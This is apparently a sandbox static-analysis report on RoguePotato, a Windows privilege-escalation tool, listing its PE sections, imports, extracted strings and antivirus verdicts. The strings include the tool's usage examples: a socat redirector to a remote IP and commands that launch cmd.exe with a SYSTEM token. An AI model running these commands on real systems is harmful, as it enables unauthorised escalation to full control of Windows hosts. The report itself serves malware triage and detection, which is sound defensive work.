Static | ZeroBOX

PE Compile Time

2020-05-12 00:00:30

PE Imphash

959a83047e80ab68b368fdb3f4c6e4ea

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00016d40 0x00016e00 6.45723754078
.rdata 0x00018000 0x0000cc90 0x0000ce00 5.10218081829
.data 0x00025000 0x000021a8 0x00000c00 2.2908076189
.pdata 0x00028000 0x00001578 0x00001600 5.05998915721
_RDATA 0x0002a000 0x00000094 0x00000200 1.10356333531
.rsrc 0x0002b000 0x000001e0 0x00000200 4.71767883295
.reloc 0x0002c000 0x00000770 0x00000800 5.27071962012

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x0002b060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x1400180e8 SetStdHandle
0x1400180f0 GetStringTypeW
0x1400180f8 FlushFileBuffers
0x140018100 GetConsoleCP
0x140018108 GetConsoleMode
0x140018110 GetFileSizeEx
0x140018118 SetFilePointerEx
0x140018120 HeapSize
0x140018128 CreateFileW
0x140018130 WriteConsoleW
0x140018138 GetProcAddress
0x140018140 OpenProcess
0x140018148 GetModuleHandleA
0x140018150 DuplicateHandle
0x140018158 GetCurrentProcess
0x140018160 ConnectNamedPipe
0x140018168 CreateThread
0x140018170 CloseHandle
0x140018178 GetCurrentThread
0x140018180 WaitForSingleObject
0x140018188 CreateNamedPipeW
0x140018190 ReadFile
0x140018198 GetProcessHeap
0x1400181a0 HeapAlloc
0x1400181a8 GetLastError
0x1400181b0 HeapFree
0x1400181b8 SetEnvironmentVariableW
0x1400181c0 FreeEnvironmentStringsW
0x1400181c8 GetEnvironmentStringsW
0x1400181d0 MultiByteToWideChar
0x1400181d8 GetCPInfo
0x1400181e0 GetOEMCP
0x1400181e8 GetACP
0x1400181f0 IsValidCodePage
0x1400181f8 FindNextFileW
0x140018200 FindFirstFileExW
0x140018208 FindClose
0x140018210 HeapReAlloc
0x140018218 WideCharToMultiByte
0x140018220 GetFileType
0x140018228 LCMapStringW
0x140018230 CompareStringW
0x140018238 UnhandledExceptionFilter
0x140018248 TerminateProcess
0x140018258 QueryPerformanceCounter
0x140018260 GetCurrentProcessId
0x140018268 GetCurrentThreadId
0x140018270 GetSystemTimeAsFileTime
0x140018278 InitializeSListHead
0x140018280 IsDebuggerPresent
0x140018288 GetStartupInfoW
0x140018290 GetModuleHandleW
0x140018298 RtlUnwindEx
0x1400182a0 RtlPcToFileHeader
0x1400182a8 RaiseException
0x1400182b0 SetLastError
0x1400182b8 EncodePointer
0x1400182c0 EnterCriticalSection
0x1400182c8 LeaveCriticalSection
0x1400182d0 DeleteCriticalSection
0x1400182e0 TlsAlloc
0x1400182e8 TlsGetValue
0x1400182f0 TlsSetValue
0x1400182f8 TlsFree
0x140018300 FreeLibrary
0x140018308 LoadLibraryExW
0x140018310 ExitProcess
0x140018318 GetModuleHandleExW
0x140018320 GetStdHandle
0x140018328 WriteFile
0x140018330 GetModuleFileNameW
0x140018338 GetCommandLineA
0x140018340 GetCommandLineW
Library USER32.dll:
0x1400183a0 SetProcessWindowStation
0x1400183a8 CloseDesktop
0x1400183b8 SetUserObjectSecurity
0x1400183c0 GetUserObjectSecurity
0x1400183c8 OpenWindowStationW
0x1400183d0 CloseWindowStation
0x1400183d8 GetProcessWindowStation
0x1400183e0 OpenDesktopW
0x1400183e8 wsprintfW
Library ADVAPI32.dll:
0x140018000 AddAccessAllowedAce
0x140018008 LookupPrivilegeValueW
0x140018010 AdjustTokenPrivileges
0x140018018 RevertToSelf
0x140018020 EqualSid
0x140018028 CloseServiceHandle
0x140018030 OpenSCManagerW
0x140018038 CreateProcessWithTokenW
0x140018040 ImpersonateLoggedOnUser
0x140018048 OpenProcessToken
0x140018050 CreateProcessAsUserW
0x140018058 OpenServiceW
0x140018060 DuplicateTokenEx
0x140018068 QueryServiceStatusEx
0x140018070 GetTokenInformation
0x140018088 OpenThreadToken
0x1400180a0 GetAclInformation
0x1400180a8 GetAce
0x1400180b0 AllocateAndInitializeSid
0x1400180b8 CopySid
0x1400180c0 AddAce
0x1400180d0 InitializeAcl
0x1400180d8 GetLengthSid
Library ole32.dll:
0x140018418 CoTaskMemAlloc
0x140018420 CoInitialize
0x140018440 CoUninitialize
0x140018448 CLSIDFromString
Library RPCRT4.dll:
0x140018350 RpcServerRegisterIf2
0x140018358 RpcEpRegisterA
0x140018360 RpcImpersonateClient
0x140018368 NdrServerCall2
0x140018370 NdrServerCallAll
0x140018378 RpcServerInqBindings
0x140018380 RpcServerUseProtseqEpA
0x140018388 RpcServerListen
Library ntdll.dll:
0x1400183f8 RtlLookupFunctionEntry
0x140018400 RtlVirtualUnwind
0x140018408 RtlCaptureContext

!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
s WATAUAVAWH
A_A^A]A\_
t$ WATAUAVAWH
A_A^A]A\_
L$ SVWH
L$ SUVWH
|$ AVH
|$ UATAUAVAWH
A_A^A]A\]
L$ SVWH
t$ UWATAUAWH
A_A]A\_]
H3E H3E
u0HcH<H
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
@A_A^A]A\_^]
H;xXu5
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
ri9O vdH
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(u
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
@USVWATAVAWH
D8d$Xt
A_A^A\_^[]
D8t$8t
D8t$8t
D$@H;G
|$ AVH
D$0H;G
CA< t(<#t
CA< t(<#t
<htl<jt\<lt4<tt$<wt
!,X< w
<htl<jt\<lt4<tt$<wt
!,X< w
t$ WAVAWH
<Ct-<D
<StW@:
<g~{<itd<ntY<ot7<pt
<utT@:
D<P0@:
k4+kP+
0A_A^_
t$ WAVAWH
<Ct-<D
<StW@:
<g~{<itd<ntY<ot7<pt
<utT@:
D<P0@:
k(+sPL
0A_A^_
VWAUAVAWH
s4+sP+
A_A^A]_^
WAVAWH
A_A^_
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
x ATAVAWH
A_A^A\
@USVWATAVAWH
A_A^A\_^[]
u3HcH<H
UVWAVAWH
0A_A^_^]
WAVAWH
fA94@u
fA94nu
0A_A^_
t$ WAVAWH
A_A^_
WAVAWH
A_A^_
x AUAVAWH
@A_A^A]
VWATAVAWH
?D8d$8t
D8d$8t
t'D8d$8t
%D8d$8t
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
L$ VWAVH
fD9t$b
@8l$Ht
L$ UVWH
WATAUAVAWH
gfffffffH
D8l$ht
A_A^A]A\_
8]8}KD
u)9\$ ~GH
UVWATAUAVAWH
@A_A^A]A\_^]
UVWATAUAVAWH
fA9<Cu
fC9<`u
A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H97u+A
UVWATAUAVAWH
L$&8\$&t,8Y
@A_A^A]A\_^]
WATAUAVAWH
fB94ht
xXI96tSI
fC94wu
0A_A^A]A\_
@UATAUAVAWH
e0A_A^A]A\]
\$ VWATAUAVH
D!l$xA
@A^A]A\_^
WAVAWH
A_A^_
UVWATAUAVAWH
D8T8>t
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
\$ UVWATAUAVAWH
H!D$ H
`A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
SUVWATAVAWH
A_A^A\_^][
@USVWATAUAVAWH
D+d$8H
#D8d$`t
A_A^A]A\_^[]
D$0H9D$8
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
H!T$0D
ue!T$(H!T$
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
UVWAVAWH
@A_A^_^]
ffffff
fffffff
USVWAVH
A^_^[]
LcA<E3
u HcA<H
Unknown exception
bad allocation
bad array new length
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
`h````
xpxxxx
`h`hhh
xwpwpp
(null)
CorExitProcess
CompareStringEx
GetSystemTimePreciseAsFileTime
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
ncacn_ip_tcp
[-] RpcServerUseProtseqEp() failed with status code %d
[-] RpcServerRegisterIf2() failed with status code %d
[-] RpcServerInqBindings() failed with status code %d
[-] RpcServerRegisterAuthInfoA() failed with status code %d
RoguePotato
[-] RpcEpRegister() failed with status code %d
[*] Starting RogueOxidResolver RPC Server listening on port %s ...
[-] RpcServerListen() failed with status code %d
[*] SecurityCallback RPC call
[*] ResolveOxid RPC call
[*] SimplePing RPC call
[*] ComplexPing RPC call
[*] ServerAlive RPC call
[*] ResolveOxid2 RPC call, this is for us!
localhost/pipe/%s[\pipe\epmapper]
NT AUTHORITY\NETWORK SERVICE
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:%s
[*] ServerAlive2 RPC Call
[*] IStoragetrigger written:%d bytes
InitializeSecurityDescriptor() failed. Error: %d
ConvertStringSecurityDescriptorToSecurityDescriptor() failed. Error: %d
[-] Error CreatePipe %d
[*] Listening on pipe %S, waiting for client to connect
[*] Client connected!
[-] Failed to impersonate the client.%d %d
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[!] RogueOxidResolver not run locally. Ensure you run it on your remote machine
RoguePotato
@splinter_code & @decoder_it
Mandatory args:
-r remote_ip: ip of the remote machine to use as redirector
-e commandline: commandline of the program to launch
Optional args:
-l listening_port: This will run the RogueOxidResolver locally on the specified port
-c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-p pipename_placeholder: placeholder to be used in the pipe name creation (default: RoguePotato)
-z : this flag will randomize the pipename_placeholder (don't use with -p)
Examples:
- Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
- RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
- RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
- RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
[*] Calling CoGetInstanceFromIStorage with CLSID:%S
[!] Error. CLSID %S not found. Bad path to object.
[-] Error SetProcessWindowStation:%d
[-] Error open Desktop:%d
[-] Error SetProcessWindowStation2:%d
[-] Error add Ace Station:%d
[-] Error add Ace desktop:%d
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
[-] OpeProcessToken err:%d
[-] LookupPrivilege err:%d
[-] AdjustPrivilege err:%d
NtQuerySystemInformation
ntdll.dll
NtDuplicateObject
NtQueryObject
[-] Could not open PID %d!)
NtQuerySystemInformation failed!
[+] Got SYSTEM Token!!!
[-] Error duplicating Primary Token:%d
[-] Error duplicating ImpersonationToken:%d
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: %S
[*] Token does NOT have SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsWithToken() for launching: %S
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
_RDATA
.rsrc$01
.rsrc$02
HeapFree
GetLastError
HeapAlloc
GetProcessHeap
ReadFile
CreateNamedPipeW
WaitForSingleObject
GetCurrentThread
CloseHandle
CreateThread
ConnectNamedPipe
GetCurrentProcess
DuplicateHandle
GetModuleHandleA
OpenProcess
GetProcAddress
KERNEL32.dll
SetUserObjectSecurity
GetUserObjectSecurity
OpenWindowStationW
GetProcessWindowStation
OpenDesktopW
wsprintfW
GetUserObjectInformationW
SetProcessWindowStation
CloseDesktop
CloseWindowStation
USER32.dll
AddAccessAllowedAce
GetLengthSid
InitializeAcl
InitializeSecurityDescriptor
AddAce
CopySid
AllocateAndInitializeSid
GetAce
GetAclInformation
GetSecurityDescriptorDacl
SetSecurityDescriptorDacl
OpenThreadToken
ConvertStringSecurityDescriptorToSecurityDescriptorW
ImpersonateNamedPipeClient
GetTokenInformation
QueryServiceStatusEx
DuplicateTokenEx
OpenServiceW
CreateProcessAsUserW
OpenProcessToken
ImpersonateLoggedOnUser
CreateProcessWithTokenW
OpenSCManagerW
CloseServiceHandle
EqualSid
RevertToSelf
AdjustTokenPrivileges
LookupPrivilegeValueW
ADVAPI32.dll
CLSIDFromString
CoTaskMemAlloc
CoInitialize
CoUninitialize
StgCreateDocfileOnILockBytes
CreateILockBytesOnHGlobal
CoGetInstanceFromIStorage
ole32.dll
RpcServerRegisterAuthInfoA
RpcServerRegisterIf2
RpcEpRegisterA
RpcImpersonateClient
RpcServerListen
RpcServerUseProtseqEpA
RpcServerInqBindings
NdrServerCallAll
NdrServerCall2
RPCRT4.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
ntdll.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwindEx
RtlPcToFileHeader
RaiseException
SetLastError
EncodePointer
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
ExitProcess
GetModuleHandleExW
GetStdHandle
WriteFile
GetModuleFileNameW
GetCommandLineA
GetCommandLineW
CompareStringW
LCMapStringW
GetFileType
WideCharToMultiByte
HeapReAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetStringTypeW
FlushFileBuffers
GetConsoleCP
GetConsoleMode
GetFileSizeEx
SetFilePointerEx
HeapSize
CreateFileW
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AUIUnknown@@
.?AUIStorage@@
.?AVIStorageTrigger@@
.?AUIMarshal@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
{99fcfec4-5260-101b-bbcb-00aa0021347a}
{00000306-0000-0000-c000-000000000046}
hello.stg
D:(A;OICI;GA;;;WD)
[+] RoguePotato gave you the SYSTEM powerz :D
[-] RoguePotato something went wrong :-(
[-] Named pipe didn't received any connect request. Exiting ...
{4991d34b-80a1-4291-83b6-3328366b9097}
RoguePotato
Wrong Argument: %s
SeImpersonatePrivilege
[-] A privilege is missing: '%ws'. Exiting ...
\\.\pipe\%S\pipe\epmapper
{00000000-0000-0000-C000-000000000046}
default
%s\default
SeAssignPrimaryTokenPrivilege
Antivirus Signature
Bkav W64.AIDetectMalware
Lionic Hacktool.Win32.RoguePotato.3!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win64.Rootkit.ch
ALYac Generic.RoguePotato.1.B9308A25
Cylance Unsafe
Zillya Tool.RoguePotato.Win64.1
Sangfor Hacktool.Win64.Roguepotato.V61h
K7AntiVirus Trojan ( 00566ef31 )
Alibaba HackTool:Win64/RoguePotato.04d9ad74
K7GW Trojan ( 00566ef31 )
Cybereason malicious.e5842e
huorong Clean
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Exploit.FakePipe
ESET-NOD32 a variant of Win64/HackTool.RoguePotato.A
APEX Clean
Avast Win64:HacktoolX-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:HackTool.Win64.RoguePotato.gen
BitDefender Generic.RoguePotato.1.B9308A25
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Generic.RoguePotato.1.B9308A25
Tencent Malware.Win32.Gencirc.11662cf8
TACHYON Clean
Sophos ATK/RPotato-C
F-Secure Trojan.TR/Agent.aauzm
DrWeb Clean
VIPRE Generic.RoguePotato.1.B9308A25
TrendMicro TROJ_GEN.R002C0DBC24
McAfeeD ti!A4778D50307D
Trapmine Clean
FireEye Generic.mg.2dd755be5842e71b
Emsisoft Generic.RoguePotato.1.B9308A25 (B)
Ikarus Trojan.Win64.Hacktool
GData Generic.RoguePotato.1.B9308A25
Jiangmin Clean
Webroot W32.Trojan.Gen
Varist W64/MSIL_Troj.APZ.gen!Eldorado
Avira TR/Agent.aauzm
Antiy-AVL GrayWare/Win32.Generic
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Clean
Xcitium Malware@#102lv8uzt4o33
Arcabit Generic.RoguePotato.1.B9308A25
SUPERAntiSpyware Clean
ZoneAlarm HEUR:HackTool.Win64.RoguePotato.gen
Microsoft VirTool:Win32/RogueP.B!MTB
Google Detected
AhnLab-V3 Malware/Win64.Generic.R372564
Acronis Clean
McAfee Artemis!2DD755BE5842
MAX malware (ai score=100)
VBA32 Clean
Malwarebytes Malware.AI.4273214749
Panda Trj/Agent.ABC
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0DBC24
Rising HackTool.RoguePotato!8.11B0C (TFE:5:XEE7jVchXEU)
Yandex Riskware.RoguePotato!G4+ry0v7GR8
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.1728101.susgen
Fortinet W64/RoguePotato.A!tr
BitDefenderTheta Clean
AVG Win64:HacktoolX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud HackTool:Win/Roguepotato
No IRMA results available.